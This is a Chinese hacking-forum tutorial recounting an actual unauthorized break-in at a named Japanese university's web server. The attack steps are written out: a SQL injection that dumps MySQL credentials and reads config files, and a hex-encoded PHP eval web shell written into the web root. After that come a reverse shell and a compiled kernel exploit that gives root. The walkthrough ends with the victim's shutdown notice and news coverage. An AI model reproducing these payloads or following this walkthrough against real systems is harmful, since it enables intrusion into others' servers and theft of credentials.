今天在群里被抓苦力了,大家讨论着妹纸,群主就说他们学校的几个日本妹纸来自日本的一个学校:京都同志社大学http://HdhCmsTest2cto测试数据/(替代网址) 想从妹子毕业的学校搞点资料什么的,然后他就YD的渗透了,然后就成功了。然后就把注入的段子发给了我,抓我做壮丁,让我把权提了,顺便写个教程发出来,因为论坛没有太多关于Linux提权的教程~~~~ 先是注入点: http://HdhCmsTest2cto测试数据 /chs/news/index.php?i=-1 然后联合查询,猜字段,查版本,查密码,读取文件…….就是各种查啊,语句是: http://HdhCmsTestjp/chs/news/index.php?i=-1+union+select+1,@@datadir,3,load_file('/etc/httpd/conf/httpd.conf'),5,group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),7,8+from+mysql.user//@@datadir为数据库文件路径
//load_file读取网站容器apache的配置文件 //group_concat读取MySQL管理员的名字、密码、是否允许读写文件和允许登录的远程计算机 虽然解得MySQL的root账户密码为mysql00,但是host为localhost,只允许本机登陆,所以用处不大。
而且Apache的配置文件显示,服务器拒绝非该大学的ip访问/admin/和phpMyAdmin,所以即使爆出管理员账户密码也没用。 前面load_file是因为发现了各文件夹权限限制的死,不允许外校ip登陆,所以就猜了一下apache的配置文件绝对路径为默认,后来发现还真的是默认的路径。 既然已经知道了Apache的配置文件的内容,我们也就轻易知道了网站物理路径,路径为:/http/www/koho/ 虽然/admin和phpMyAdmin的目录都限制了,但是想了想,我们只要有注入点就可以可以写入shell了,因为php的GPC为off,怎么判断为off我就不说了。 直接写一句话: 1 http://HdhCmsTestjp/chs/news/index.php?i=-1+union+select+ 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,0x3c3f2f2a,3,4,5,6,7,0x2a2f3f3e+into+outfile+'/http/www/koho/english/engnews_img/aa.php'# 2 //最后的#是为了闭合前面的语句 3 /*其中的0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E 4 为一句话<?php @eval($_POST['cmd']);?>的HEX编码,不懂(HEX编码)的话Google一下就好*/ 5 //如果直接select 一句话into outfile '路径'会提示字段数不同,所以select 1,2,3,4...来执行注入语句 6 //后面的0x3c3f2f2a和0x2a2f3f3e分别为'<?php //'的和'?>'HEX因为select后面的3,4,5,6会被写入webshell中,可能会导致一句话执行错误 7 //所以最后aa.php的内容就是"<?php @eval($_POST['cmd']);?><?php //3,4,5,6,7 ?>" HEX其实就是十六进制编码,不知道这个编码的话,去搜一下好了,HEX编码转换在线本地各种工具各种有 通过上述注入语句,我们就得到了一句话木马: http://HdhCmsTest2cto测试数据 /english/engnews_img/aa.php
复制代码用菜刀连接,密码是cmd,如图所示:
上传大马,得到:http://HdhCmsTestdoshisha.ac.jp/english/engnews_img/script.php 直接用shell里面的反弹功能反弹到本地先,本地监听:
远程服务器端转发:
然后在命令提示行里看了一下,现在的权限是:
之后按照惯例我看了一下/tmp/文件夹,发现/TMP/权限居然被禁掉了,很少有服务器禁掉这个文件夹的。
好在赋权给这个文件夹不需要root,直接执行赋权语句: chmod +x /tmp/ 复制代码在这说一下,linux里面的文件夹跟文件一样,执行命令自然也可以按照像文件一样的执行 1 uname-a 2 //其实lsb_release -a如图所示:
内核版本:linux mainz1 2.6.28-194.e15 系统描述为:Red Hat Enterprise Linux Server release 5.5 (Tikanga) 查完了系统版本之后就去找找相应的提权脚本!~然后传到/tmp/文件夹
然后给予执行权限 一般我都是传上去c源文件,然后]gcc -o /tmp/程序 /tmp/C源码]这样,如果gcc不能用,在其他机器编译好了直接传上去其实也可以,就像这样
chmod +x /tmp/2.6.18-194 然后直接执行!~
得到了root权限好的,文章到此结束。说点额外话 我们驻扎在这个学校的服务器还没有改过数据,删过东西,第六天管理员就把网站关闭了并且踢了我们,效率很高。关站以后公告如下:
ホームページの一時停止について
過日、本学ホームページのWebサーバに対し不正アクセスがありました。 当該Webサーバは個人情報を管理する役割を持たないため、個人情報漏洩等の被害は 無いと認識しておりますが、第三者機関による詳細調査と更なる不正アクセスの防止のため、 現在は本学公式ホームページを閉鎖し、代替措置として下記の簡易コンテンツを 掲載のうえ、復旧に努めています。 大変なご不便・ご迷惑をおかけいたしますが、何卒ご理解とご協力を賜りますようお願い申し上げます。 关闭网站还是小事,众所周知日本有四大报业集团,关闭网站后日本的四大报业均报道了这件事情,新闻链接和摘抄如下: 每日新闻的报道:http://mainichi.jp/select/biz/news/20120114k0000e040185000c.html
同志社大:不正アクセスでHP閉鎖 同志社大(京都市)がホームページ(HP)のサーバーに不正アクセスがあったとして、HPを閉鎖していたことが14日、分かった。HPの改ざんや個人情報の流出は確認されていない。 同大学によると、中国のインターネット掲示板に同大学へのサイバー攻撃を呼びかける書き込みが見つかった。中国からの不正アクセスとみて侵入経路を調べるとともに、受験情報などを簡易版HPで掲載している。 今月6日に大学職員がサーバーの定期チェックをし、外部から侵入された形跡を発見。サーバー内に個人情報は保存されておらず、入試問題を含め情報漏えいは無いという。同大学は外部のセキュリティー管理会社に調査を依頼し、11日からHPを閉鎖している。【五十嵐和大】朝日新闻社的报道:http://HdhCmsTestasahi测试数据/digital/internet/OSK201201140064.html
同志社大に不正アクセス、HP閉鎖 中国からの閲覧急増 同 志社大(京都市上京区)はサーバーに不正アクセスがあったとして、公式ホームページ(HP)を11日から閉鎖し、代替用に簡易版HPを設けた。職員が6 日、データを書き換えようとした痕跡を見つけ調査。年末年始に中国からの閲覧者が急増し、中国のハッカー用掲示板に同志社大のHPを攻撃する方法が掲載さ れたという。HPは大学案内が中心で個人情報は掲載しておらず、情報がもれた形跡もないという。さらなる不正アクセスを防止するため業者に詳しい調査を依 頼し、セキュリティーのレベルを上げるという 看到这里我感触很深。在日本一个普通大学被入侵,虽然没有任何损失,但是由于日本的媒体曝光和问责制度,除了逼迫着管理人员加强安全措施,更让原负责任丢了饭碗。 和这个行程鲜明对比的是,网站被驻扎一年不改改首页管理员是不会知道的,被踢出去也是被后面上来的 黑客 踢出去的。 就算是网站首页被改,因为网站运营者不重视,管理员没责任,黑客还是进出自如,脱库、挂马、改页,样样不缺。
总结: 这个注入点的基本思路就是,发现MySQL账户为root,GPC设置为off,搞到了物理路径就直接写Webshell了 提权部分原理就是,本地监听端口,将对方机器反弹回cmdshell来,然后把和内核版本对应的EXP传上去,编译运行,得到root
查看更多关于注入+直接写shell并提权拿root - 网站安全 - 自学的详细内容...